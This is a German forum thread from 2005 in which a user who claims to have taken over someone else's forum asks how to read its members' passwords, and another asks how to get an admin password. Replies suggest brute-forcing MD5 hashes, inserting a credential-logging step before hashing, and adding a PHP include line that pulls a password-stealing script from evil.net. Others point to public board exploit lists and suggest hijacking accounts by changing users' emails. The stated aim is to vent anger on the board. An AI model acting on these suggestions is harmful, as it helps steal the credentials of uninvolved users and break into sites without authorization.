Habe ein Forum overtaked nun frage

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Keil, 9. April 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 9. April 2005
    So habe es geschafft nen Forum in meinem besitz zu nehmen (http://57***.rapidforum.com/) so meine frage ist es nun ob da was so einstellen kann das ich die passwörter von jedem user der da registiert einsehen kann? Ist das möglich wenn ja wie? ^^
     
  2. 9. April 2005
    die pw's kann man soweit ich weis nicht einsehen da die verschlüsselt gespeichert werden
     
  3. 9. April 2005
    das stimmt, du kannst sie höchstens ändern
     
  4. 9. April 2005
    Ja das weiß ich auch >.< aber irgendne möglichkeit musses da doch geben ?(
     
  5. 9. April 2005
    nein,

    die pws sind alle mit MD5 verschlüsselt, die kannste höchstens bruten
     
  6. 19. Juni 2005
    und wie hast du es in dein besitz genommen?
    wie kann man eigentlich das adminpw raus bekommen?
    muss man bruten???
     
  7. 19. Juni 2005
    du kannst nen zwischen login machen vor der chiffrierung, so dass wenn isch jemand einlog die eingegebenen würter mitgespeichert werden. sry ich kann aber keinphp von daher kann ich dir da net weiter helfen
     
  8. 19. Juni 2005
    ja gut, aber es ist ja so, dass er einfach auf der admin site das PW eingibt, wie bekomm ich dann mein PHP teil dazwischen?
     
  9. 19. Juni 2005
    Du kannst ja den Quellcode ändern, wenn du das Forum "übernommen" hast.
    Code:
    <? include('http://evil.net/passklau.php') ?>
    
    oder den Code direkt reinschreiben, da es sein kann dass der Hoster nur bestimmte Pfade erlaubt und du somit nicht auf php-Dateien außerhalb deines Wurzelverzeichnis zugreifen kannst.
     
  10. 19. Juni 2005
    ich glaub ihr habt mich falsch verstanden....
    ich meine nicht die PW's von den Nutzern raus bnekommen, sondern das Admin PW!! Bzw wie ich das frum "übernehmen" kann
     
  11. 19. Juni 2005
    mit nem exploidt da gibts 1000 frage threads! such einfach exploit oder cookie explloit bei goooogle.de


    EDIT: so hier: http://www.milw0rm.com/phpsoft.php hier zu allen möglichen board exploits
     
  12. 19. Juni 2005
    hab mal ein bischen hin und her gegoooogelt, aber nichts gefunden!

    das rapidforum zu dem ich mir zutrott verschaffen möchte hat so viel ich weiß wbb v.1.5.5.1
    also, dazu habe ich ma nix gefunden....

    kann mir jemand weiter helfen?
     
  13. 21. Juni 2005
    also gibt es wirklich keine möglichkeit die PWs von den User raus zu bekommen auch nicht wenn man die Datenbank und das komplette forum hat??
     
  14. 21. Juni 2005
    Doch die gibt es.

    Im Acp die email des users auf eine umändern die dir gehört und dir dann passwort zuschicken lassen als hättest du es vergessen. fiel mir gerade so ein. bitte korrigieren falls das net geht ?(
     
  15. 21. Juni 2005
    funzt leider nicht, weil ich der user dann einfach nen neues PW zugewiesen bekommt, und das einfach so kommt auch nen bisschen doof....

    also weiter suchen ist angesagt..
     
  16. 21. Juni 2005
    Um ein Forum komplett zu "übernehmen" musst du nicht nur das Admin-PW vom Board haben. Du brauchst auch die Login-Daten vom Space und die vom Redi. Aber selbst dann hat der Admin noch Möglichkeiten...

    Fazit: Board komplett "übernehmen" ist Schwachsinn.
     
  17. 21. Juni 2005
    na ja, nicht unbedingt ganz übernehmen, nur mal meine wut am board auslassen!!!!!!!!!
     
  18. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.